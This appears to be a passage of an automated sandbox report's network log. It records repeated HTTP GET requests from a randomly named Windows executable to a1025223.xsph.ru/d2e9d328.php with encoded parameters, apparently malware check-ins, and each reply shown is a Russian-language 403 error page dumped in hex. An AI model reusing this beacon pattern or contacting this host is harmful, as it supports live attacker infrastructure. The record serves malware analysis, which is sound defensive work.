                                  Sep 27, 2024 08:42:23.321749926 CEST1236INData Raw: 74 69 66 79 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 73 70 61 63 65 2d 62 65 74 77 65 65 6e 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 7d 2e 77 72 61 70 70 65 72 20 2e 63 6f 6e 74 65 6e 74 20 2e 6c 65 66 74 2d 73 69 64 65 7b
                                  Data Ascii: tify;justify-content:space-between;position:relative}.wrapper .content .left-side{display:table;height:450px}.wrapper .content .left-side .error-block{display:-webkit-inline-box;display:-webkit-inline-flex;display:-moz-inline-box;display:-ms-i
                                  Sep 27, 2024 08:42:23.321768045 CEST448INData Raw: 74 3a 37 30 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 33 38 70 78 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 31 36 70 78 3b 77 68 69 74 65 2d 73 70 61 63 65 3a 70 72 65 2d 6c 69 6e 65 7d 2e 77 72 61
                                  Data Ascii: t:700;font-size:38px;line-height:100%;margin-bottom:16px;white-space:pre-line}.wrapper .content .right-side{display:table}.wrapper .content .footer,.wrapper .content .right-side .image-container{display:-webkit-box;display:-webkit-flex;display
                                  Sep 27, 2024 08:42:23.321784019 CEST1236INData Raw: 2d 62 6f 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 2d 6d 73 2d 66 6c 65 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 3b 2d 77 65 62 6b 69 74 2d 61 6c 69 67 6e 2d 63 6f 6e 74 65 6e 74
                                  Data Ascii: -box-pack:center;-ms-flex-pack:center;justify-content:center;-webkit-align-content:center;-ms-flex-line-pack:center;align-content:center}.wrapper .content .footer__logo svg,.wrapper .content .right-side .image-container img{width:inherit;heigh
                                  Sep 27, 2024 08:42:23.321798086 CEST1236INData Raw: 74 6f 6d 3a 35 32 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 72 69 67 68 74 3a 36 31 70 78 7d 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 31 31 30 35 70 78 29 20 61 6e 64 20 28 6d
                                  Data Ascii: tom:52px;position:absolute;right:61px}}@media screen and (max-width:1105px) and (max-height:720px){.wrapper .content .right-side{display:none}}@media screen and (max-width:1105px){.wrapper .content .right-side .image-container-xs{display:block
                                  Sep 27, 2024 08:42:23.321813107 CEST1236INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 31 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 2d 62 6c 6f 63 6b 5f 5f 74 69 74 6c 65 22 3e d0 a1 d0 b0 d0 b9 d1 82 20 d0 b7 d0 b0 d0 b1 d0 bb d0 be d0 ba d0 b8 d1 80 d0 be d0 b2 d0 b0 d0 bd 3c 2f 68 31
                                  Data Ascii: <h1 class="error-block__title"> </h1> <p class="error-block__desc">, </p> </div> </div>
                                  Sep 27, 2024 08:42:23.321827888 CEST1236INData Raw: 2e 36 30 32 20 39 38 2e 32 37 39 39 20 31 36 38 2e 35 35 39 20 39 36 2e 33 37 30 34 20 31 36 39 2e 35 31 35 20 39 34 2e 38 34 32 38 43 31 36 39 2e 38 39 38 20 39 34 2e 32 37 20 31 37 30 2e 32 38 20 39 33 2e 38 38 38 31 20 31 37 30 2e 36 36 33 20
                                  Data Ascii: .602 98.2799 168.559 96.3704 169.515 94.8428C169.898 94.27 170.28 93.8881 170.663 93.3152C171.619 91.9786 172.767 90.6419 173.149 88.9234C173.34 87.7777 172.575 87.2048 172.193 87.0139C171.428 86.441 170.471 86.632 169.706 87.0139C168.75 87.58
                                  Sep 27, 2024 08:42:23.321844101 CEST328INData Raw: 32 38 2e 39 36 37 20 39 37 2e 35 31 36 31 43 31 33 32 2e 36 30 31 20 39 36 2e 33 37 30 34 20 31 33 36 2e 32 33 35 20 39 35 2e 34 31 35 37 20 31 33 39 2e 36 37 38 20 39 34 2e 32 37 43 31 34 30 2e 36 33 34 20 39 33 2e 38 38 38 31 20 31 34 30 2e 32
                                  Data Ascii: 28.967 97.5161C132.601 96.3704 136.235 95.4157 139.678 94.27C140.634 93.8881 140.251 92.1695 139.104 92.3605Z" fill="black"/> <path d="M196.866 87.9678C193.232 87.5859 189.598 87.5859 186.155 87.5859C185.008 87.5859 185.008 89.4954 186
                                  Sep 27, 2024 08:42:23.321857929 CEST1236INData Raw: 39 2e 34 39 35 34 20 31 39 37 2e 38 32 32 20 38 38 2e 39 32 32 36 43 31 39 37 2e 38 32 32 20 38 38 2e 33 34 39 37 20 31 39 37 2e 34 34 20 38 37 2e 39 36 37 38 20 31 39 36 2e 38 36 36 20 38 37 2e 39 36 37 38 5a 22 20 66 69 6c 6c 3d 22 62 6c 61 63
                                  Data Ascii: 9.4954 197.822 88.9226C197.822 88.3497 197.44 87.9678 196.866 87.9678Z" fill="black"/> <path d="M199.352 96.3699C195.718 94.8423 191.893 93.3147 188.259 91.7871C187.876 91.5962 187.303 91.9781 187.111 92.36C186.92 92.9328 187.303 93.31
                                  Sep 27, 2024 08:42:23.321871996 CEST792INData Raw: 32 33 2e 30 36 39 20 36 38 2e 38 37 34 32 43 32 32 37 2e 30 38 36 20 35 34 2e 35 35 33 20 32 33 35 2e 35 30 32 20 34 31 2e 35 36 38 33 20 32 33 37 2e 37 39 37 20 32 36 2e 36 37 34 32 43 32 33 38 2e 35 36 32 20 32 36 2e 32 39 32 33 20 32 33 38 2e
                                  Data Ascii: 23.069 68.8742C227.086 54.553 235.502 41.5683 237.797 26.6742C238.562 26.2923 238.753 25.1466 237.797 24.9557C226.703 22.6643 215.419 25.5285 205.282 29.9204C199.926 32.2118 194.762 34.8851 189.598 37.3674C184.625 39.8498 179.461 42.3321 174.1
                                  Sep 27, 2024 08:42:23.341792107 CEST1236INData Raw: 34 30 36 36 20 35 33 2e 30 32 35 34 20 35 38 2e 30 30 37 35 20 35 33 2e 39 38 30 31 43 35 37 2e 32 34 32 34 20 35 34 2e 31 37 31 31 20 35 37 2e 30 35 31 32 20 35 35 2e 31 32 35 38 20 35 37 2e 36 32 35 20 35 35 2e 35 30 37 37 43 36 33 2e 33 36 32
                                  Data Ascii: 4066 53.0254 58.0075 53.9801C57.2424 54.1711 57.0512 55.1258 57.625 55.5077C63.3629 61.4272 69.1009 67.3466 75.0301 73.2661C80.1943 78.4217 85.5497 83.1955 91.6702 87.2055C94.7304 89.115 97.9819 90.8335 101.425 92.1702C103.146 102.481 105.059
                                  Sep 27, 2024 08:42:23.572715998 CEST441OUTGET /d2e9d328.php?YyNDR3TlOsqwkTKEyKWhRDLsjJJiW2r=BuUiy1r4iQfw1ZDtv1bvF&2132410dd3c9d0ed40475469f1dad04b=a4985c72318361485c5567463b9f03e9&5f975759356989d1a1cbaf57a59bcab1=AMiJGN0MDN0cjYwMGNmV2Y3UWOzADMiFjMkBTY0MTOllDOzETYyMGO&YyNDR3TlOsqwkTKEyKWhRDLsjJJiW2r=BuUiy1r4iQfw1ZDtv1bvF HTTP/1.1
                                  Accept: */*
                                  Content-Type: application/json
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                  Host: a1025223.xsph.ru
                                  Sep 27, 2024 08:42:23.780380964 CEST1236INHTTP/1.1 403 Forbidden
                                  Server: openresty
                                  Date: Fri, 27 Sep 2024 06:42:23 GMT
                                  Content-Type: text/html
                                  Transfer-Encoding: chunked
                                  Connection: keep-alive
                                  Vary: Accept-Encoding
                                  Data Raw: 64 66 62 65 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e d0 9e d1 88 d0 b8 d0 b1 d0 ba d0 b0 20 34 30 33 30 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 62 6f 64 79 2c 68 31 2c 70 7b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 7d 2a 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 74 79 6c 65 3a 6e 6f 72 6d 61 6c 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 7d 2e 77 72 61 70 70 65 72 2c 2e 77 72 61 70 70 65 72 20 2e 63 6f 6e 74 65 6e 74 7b 77 69 64 74 68 3a 31 30 30 25 3b 64 69 73 70 6c 61 79 3a 2d [TRUNCATED]
                                  Data Ascii: dfbe<!DOCTYPE html><html lang="en"><head> <meta charset="UTF-8"> <title> 4030</title> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <style>body,h1,p{padding:0;margin:0}*{font-family:Arial,sans-serif;font-style:normal;font-weight:400}.wrapper,.wrapper .content{width:100%;display:-webkit-box;display:-webkit-flex;display:-moz-box;display:-ms-flexbox;display:flex;-webkit-box-pack:center;-webkit-justify-content:center;-moz-box-pack:center;-ms-flex-pack:center;justify-content:center}.wrapper .content{width:inherit;max-width:1032px;height:100%;-webkit-box-orient:horizontal;-webkit-box-direction:normal;-webkit-flex-direction:row;-moz-box-orient:horizontal;-moz-box-direction:normal;-ms-flex-direction:row;flex-direction:row;padding:128px 16px 0;min-height:-moz-calc(100vh - 128px);min-height:calc(100vh - 128px);-webkit-box-sizing:content-box;-moz-box-sizing:content-box;box-sizing:content-box;-webkit-box-pack:justify;-webkit-justify-content:space-betwe [TRUNCATED]


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  1192.168.2.949715141.8.194.149805336C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe
                                  TimestampBytes transferredDirectionData
                                  Sep 27, 2024 08:42:44.088402987 CEST428OUTGET /d2e9d328.php?UJm7tEakW4DhlWwkna0hC=XFOwV2Tzt0&2132410dd3c9d0ed40475469f1dad04b=a4985c72318361485c5567463b9f03e9&5f975759356989d1a1cbaf57a59bcab1=AMiJGN0MDN0cjYwMGNmV2Y3UWOzADMiFjMkBTY0MTOllDOzETYyMGO&UJm7tEakW4DhlWwkna0hC=XFOwV2Tzt0 HTTP/1.1
                                  Accept: */*
                                  Content-Type: text/html
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                  Host: a1025223.xsph.ru
                                  Connection: Keep-Alive
                                  Sep 27, 2024 08:42:44.758685112 CEST1236INHTTP/1.1 403 Forbidden
                                  Server: openresty
                                  Date: Fri, 27 Sep 2024 06:42:44 GMT
                                  Content-Type: text/html
                                  Transfer-Encoding: chunked
                                  Connection: keep-alive
                                  Vary: Accept-Encoding
                                  Data Raw: 64 66 62 65 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e d0 9e d1 88 d0 b8 d0 b1 d0 ba d0 b0 20 34 30 33 30 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 62 6f 64 79 2c 68 31 2c 70 7b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 7d 2a 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 74 79 6c 65 3a 6e 6f 72 6d 61 6c 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 7d 2e 77 72 61 70 70 65 72 2c 2e 77 72 61 70 70 65 72 20 2e 63 6f 6e 74 65 6e 74 7b 77 69 64 74 68 3a 31 30 30 25 3b 64 69 73 70 6c 61 79 3a 2d [TRUNCATED]
                                  Data Ascii: dfbe<!DOCTYPE html><html lang="en"><head> <meta charset="UTF-8"> <title> 4030</title> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <style>body,h1,p{padding:0;margin:0}*{font-family:Arial,sans-serif;font-style:normal;font-weight:400}.wrapper,.wrapper .content{width:100%;display:-webkit-box;display:-webkit-flex;display:-moz-box;display:-ms-flexbox;display:flex;-webkit-box-pack:center;-webkit-justify-content:center;-moz-box-pack:center;-ms-flex-pack:center;justify-content:center}.wrapper .content{width:inherit;max-width:1032px;height:100%;-webkit-box-orient:horizontal;-webkit-box-direction:normal;-webkit-flex-direction:row;-moz-box-orient:horizontal;-moz-box-direction:normal;-ms-flex-direction:row;flex-direction:row;padding:128px 16px 0;min-height:-moz-calc(100vh - 128px);min-height:calc(100vh - 128px);-webkit-box-sizing:content-box;-moz-box-sizing:content-box;box-sizing:content-box;-webkit-box-pack:justify;-webkit-justify-content:space-betwe [TRUNCATED]
                                  Sep 27, 2024 08:42:44.758759975 CEST1236INData Raw: 74 69 66 79 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 73 70 61 63 65 2d 62 65 74 77 65 65 6e 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 7d 2e 77 72 61 70 70 65 72 20 2e 63 6f 6e 74 65 6e 74 20 2e 6c 65 66 74 2d 73 69 64 65 7b
                                  Data Ascii: tify;justify-content:space-between;position:relative}.wrapper .content .left-side{display:table;height:450px}.wrapper .content .left-side .error-block{display:-webkit-inline-box;display:-webkit-inline-flex;display:-moz-inline-box;display:-ms-i
                                  Sep 27, 2024 08:42:44.758783102 CEST448INData Raw: 74 3a 37 30 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 33 38 70 78 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 31 36 70 78 3b 77 68 69 74 65 2d 73 70 61 63 65 3a 70 72 65 2d 6c 69 6e 65 7d 2e 77 72 61
                                  Data Ascii: t:700;font-size:38px;line-height:100%;margin-bottom:16px;white-space:pre-line}.wrapper .content .right-side{display:table}.wrapper .content .footer,.wrapper .content .right-side .image-container{display:-webkit-box;display:-webkit-flex;display
                                  Sep 27, 2024 08:42:44.758800983 CEST1236INData Raw: 2d 62 6f 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 2d 6d 73 2d 66 6c 65 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 3b 2d 77 65 62 6b 69 74 2d 61 6c 69 67 6e 2d 63 6f 6e 74 65 6e 74
                                  Data Ascii: -box-pack:center;-ms-flex-pack:center;justify-content:center;-webkit-align-content:center;-ms-flex-line-pack:center;align-content:center}.wrapper .content .footer__logo svg,.wrapper .content .right-side .image-container img{width:inherit;heigh
                                  Sep 27, 2024 08:42:44.758816957 CEST1236INData Raw: 74 6f 6d 3a 35 32 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 72 69 67 68 74 3a 36 31 70 78 7d 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 31 31 30 35 70 78 29 20 61 6e 64 20 28 6d
                                  Data Ascii: tom:52px;position:absolute;right:61px}}@media screen and (max-width:1105px) and (max-height:720px){.wrapper .content .right-side{display:none}}@media screen and (max-width:1105px){.wrapper .content .right-side .image-container-xs{display:block
                                  Sep 27, 2024 08:42:44.758833885 CEST1236INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 31 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 2d 62 6c 6f 63 6b 5f 5f 74 69 74 6c 65 22 3e d0 a1 d0 b0 d0 b9 d1 82 20 d0 b7 d0 b0 d0 b1 d0 bb d0 be d0 ba d0 b8 d1 80 d0 be d0 b2 d0 b0 d0 bd 3c 2f 68 31
                                  Data Ascii: <h1 class="error-block__title"> </h1> <p class="error-block__desc">, </p> </div> </div>
                                  Sep 27, 2024 08:42:44.758852959 CEST672INData Raw: 2e 36 30 32 20 39 38 2e 32 37 39 39 20 31 36 38 2e 35 35 39 20 39 36 2e 33 37 30 34 20 31 36 39 2e 35 31 35 20 39 34 2e 38 34 32 38 43 31 36 39 2e 38 39 38 20 39 34 2e 32 37 20 31 37 30 2e 32 38 20 39 33 2e 38 38 38 31 20 31 37 30 2e 36 36 33 20
                                  Data Ascii: .602 98.2799 168.559 96.3704 169.515 94.8428C169.898 94.27 170.28 93.8881 170.663 93.3152C171.619 91.9786 172.767 90.6419 173.149 88.9234C173.34 87.7777 172.575 87.2048 172.193 87.0139C171.428 86.441 170.471 86.632 169.706 87.0139C168.75 87.58
                                  Sep 27, 2024 08:42:44.758872986 CEST1236INData Raw: 20 31 36 33 2e 32 30 33 20 31 30 31 2e 31 34 34 20 31 36 31 2e 38 36 34 20 31 30 31 2e 39 30 38 43 31 36 30 2e 39 30 38 20 31 30 32 2e 34 38 31 20 31 36 31 2e 36 37 33 20 31 30 34 2e 31 39 39 20 31 36 32 2e 38 32 31 20 31 30 33 2e 36 32 37 43 31
                                  Data Ascii: 163.203 101.144 161.864 101.908C160.908 102.481 161.673 104.199 162.821 103.627C165.69 101.908 169.133 101.526 172.193 102.672C173.34 103.054 173.914 101.144 172.767 100.762Z" fill="black"/> <path d="M141.208 97.1331C138.721 99.8064 1
                                  Sep 27, 2024 08:42:44.758886099 CEST224INData Raw: 39 2e 39 32 36 20 39 37 2e 35 31 35 36 43 32 30 30 2e 31 31 37 20 39 36 2e 39 34 32 38 20 31 39 39 2e 39 32 36 20 39 36 2e 35 36 30 39 20 31 39 39 2e 33 35 32 20 39 36 2e 33 36 39 39 5a 22 20 66 69 6c 6c 3d 22 62 6c 61 63 6b 22 2f 3e 0a 20 20 20
                                  Data Ascii: 9.926 97.5156C200.117 96.9428 199.926 96.5609 199.352 96.3699Z" fill="black"/> <path d="M311.434 112.411C311.816 111.647 311.242 111.074 310.669 110.883C308.756 110.692 307.035 110.501 305.122 110.31C306.652 108.974
                                  Sep 27, 2024 08:42:44.758904934 CEST1236INData Raw: 33 30 38 2e 31 38 32 20 31 30 37 2e 34 34 36 20 33 30 39 2e 35 32 31 20 31 30 35 2e 37 32 38 43 33 30 39 2e 39 30 34 20 31 30 35 2e 31 35 35 20 33 30 39 2e 33 33 20 31 30 34 2e 32 20 33 30 38 2e 37 35 36 20 31 30 34 2e 32 43 33 30 35 2e 33 31 33
                                  Data Ascii: 308.182 107.446 309.521 105.728C309.904 105.155 309.33 104.2 308.756 104.2C305.313 104.2 301.87 104.964 298.619 106.3C298.619 106.3 296.898 106.873 296.324 107.255C295.941 106.873 294.794 106.11 294.411 106.11C295.176 104.391 296.324 102.291 2
                                  Sep 27, 2024 08:42:44.763771057 CEST1236INData Raw: 20 31 33 32 2e 39 38 33 20 34 31 2e 39 35 30 32 43 31 33 30 2e 36 38 38 20 34 33 2e 32 38 36 39 20 31 32 38 2e 32 30 32 20 34 34 2e 36 32 33 35 20 31 32 35 2e 37 31 35 20 34 35 2e 39 36 30 32 43 31 32 33 2e 34 32 20 34 37 2e 32 39 36 39 20 31 32
                                  Data Ascii: 132.983 41.9502C130.688 43.2869 128.202 44.6235 125.715 45.9602C123.42 47.2969 121.316 48.6335 118.83 49.2064C118.83 49.2064 117.108 48.4426 116.917 48.4426C101.233 45.7692 86.8885 48.4426 71.3961 51.3068C66.997 52.0706 62.4066 53.0254 58.007
                                  Sep 27, 2024 08:42:44.990245104 CEST404OUTGET /d2e9d328.php?UJm7tEakW4DhlWwkna0hC=XFOwV2Tzt0&2132410dd3c9d0ed40475469f1dad04b=a4985c72318361485c5567463b9f03e9&5f975759356989d1a1cbaf57a59bcab1=AMiJGN0MDN0cjYwMGNmV2Y3UWOzADMiFjMkBTY0MTOllDOzETYyMGO&UJm7tEakW4DhlWwkna0hC=XFOwV2Tzt0 HTTP/1.1
                                  Accept: */*
                                  Content-Type: text/html
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                  Host: a1025223.xsph.ru
                                  Sep 27, 2024 08:42:45.228665113 CEST1236INHTTP/1.1 403 Forbidden
                                  Server: openresty
                                  Date: Fri, 27 Sep 2024 06:42:45 GMT
                                  Content-Type: text/html
                                  Transfer-Encoding: chunked
                                  Connection: keep-alive
                                  Vary: Accept-Encoding
                                  Data Raw: 64 66 62 65 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e d0 9e d1 88 d0 b8 d0 b1 d0 ba d0 b0 20 34 30 33 30 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 62 6f 64 79 2c 68 31 2c 70 7b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 7d 2a 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 74 79 6c 65 3a 6e 6f 72 6d 61 6c 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 7d 2e 77 72 61 70 70 65 72 2c 2e 77 72 61 70 70 65 72 20 2e 63 6f 6e 74 65 6e 74 7b 77 69 64 74 68 3a 31 30 30 25 3b 64 69 73 70 6c 61 79 3a 2d [TRUNCATED]
                                  Data Ascii: dfbe<!DOCTYPE html><html lang="en"><head> <meta charset="UTF-8"> <title> 4030</title> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <style>body,h1,p{padding:0;margin:0}*{font-family:Arial,sans-serif;font-style:normal;font-weight:400}.wrapper,.wrapper .content{width:100%;display:-webkit-box;display:-webkit-flex;display:-moz-box;display:-ms-flexbox;display:flex;-webkit-box-pack:center;-webkit-justify-content:center;-moz-box-pack:center;-ms-flex-pack:center;justify-content:center}.wrapper .content{width:inherit;max-width:1032px;height:100%;-webkit-box-orient:horizontal;-webkit-box-direction:normal;-webkit-flex-direction:row;-moz-box-orient:horizontal;-moz-box-direction:normal;-ms-flex-direction:row;flex-direction:row;padding:128px 16px 0;min-height:-moz-calc(100vh - 128px);min-height:calc(100vh - 128px);-webkit-box-sizing:content-box;-moz-box-sizing:content-box;box-sizing:content-box;-webkit-box-pack:justify;-webkit-justify-content:space-betwe [TRUNCATED]


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  2192.168.2.949716141.8.194.149805376C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe
                                  TimestampBytes transferredDirectionData
                                  Sep 27, 2024 08:42:56.465290070 CEST477OUTGET /d2e9d328.php?TIhQfugI6qD9EGxcg3vTGUCLj6Y4Mi=5F3FLPT&2132410dd3c9d0ed40475469f1dad04b=a4985c72318361485c5567463b9f03e9&5f975759356989d1a1cbaf57a59bcab1=AMiJGN0MDN0cjYwMGNmV2Y3UWOzADMiFjMkBTY0MTOllDOzETYyMGO&TIhQfugI6qD9EGxcg3vTGUCLj6Y4Mi=5F3FLPT HTTP/1.1
                                  Accept: */*
                                  Content-Type: text/plain
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                  Host: a1025223.xsph.ru
                                  Connection: Keep-Alive
                                  Sep 27, 2024 08:42:57.134569883 CEST1236INHTTP/1.1 403 Forbidden
                                  Server: openresty
                                  Date: Fri, 27 Sep 2024 06:42:56 GMT
                                  Content-Type: text/html
                                  Transfer-Encoding: chunked
                                  Connection: keep-alive
                                  Vary: Accept-Encoding
                                  Data Raw: 64 66 62 65 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e d0 9e d1 88 d0 b8 d0 b1 d0 ba d0 b0 20 34 30 33 30 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 62 6f 64 79 2c 68 31 2c 70 7b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 7d 2a 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 74 79 6c 65 3a 6e 6f 72 6d 61 6c 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 7d 2e 77 72 61 70 70 65 72 2c 2e 77 72 61 70 70 65 72 20 2e 63 6f 6e 74 65 6e 74 7b 77 69 64 74 68 3a 31 30 30 25 3b 64 69 73 70 6c 61 79 3a 2d [TRUNCATED]
                                  Data Ascii: dfbe<!DOCTYPE html><html lang="en"><head> <meta charset="UTF-8"> <title> 4030</title> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <style>body,h1,p{padding:0;margin:0}*{font-family:Arial,sans-serif;font-style:normal;font-weight:400}.wrapper,.wrapper .content{width:100%;display:-webkit-box;display:-webkit-flex;display:-moz-box;display:-ms-flexbox;display:flex;-webkit-box-pack:center;-webkit-justify-content:center;-moz-box-pack:center;-ms-flex-pack:center;justify-content:center}.wrapper .content{width:inherit;max-width:1032px;height:100%;-webkit-box-orient:horizontal;-webkit-box-direction:normal;-webkit-flex-direction:row;-moz-box-orient:horizontal;-moz-box-direction:normal;-ms-flex-direction:row;flex-direction:row;padding:128px 16px 0;min-height:-moz-calc(100vh - 128px);min-height:calc(100vh - 128px);-webkit-box-sizing:content-box;-moz-box-sizing:content-box;box-sizing:content-box;-webkit-box-pack:justify;-webkit-justify-content:space-betwe [TRUNCATED]
                                  Sep 27, 2024 08:42:57.134592056 CEST1236INData Raw: 74 69 66 79 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 73 70 61 63 65 2d 62 65 74 77 65 65 6e 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 7d 2e 77 72 61 70 70 65 72 20 2e 63 6f 6e 74 65 6e 74 20 2e 6c 65 66 74 2d 73 69 64 65 7b
                                  Data Ascii: tify;justify-content:space-between;position:relative}.wrapper .content .left-side{display:table;height:450px}.wrapper .content .left-side .error-block{display:-webkit-inline-box;display:-webkit-inline-flex;display:-moz-inline-box;display:-ms-i
                                  Sep 27, 2024 08:42:57.134618998 CEST1236INData Raw: 74 3a 37 30 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 33 38 70 78 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 31 36 70 78 3b 77 68 69 74 65 2d 73 70 61 63 65 3a 70 72 65 2d 6c 69 6e 65 7d 2e 77 72 61
                                  Data Ascii: t:700;font-size:38px;line-height:100%;margin-bottom:16px;white-space:pre-line}.wrapper .content .right-side{display:table}.wrapper .content .footer,.wrapper .content .right-side .image-container{display:-webkit-box;display:-webkit-flex;display
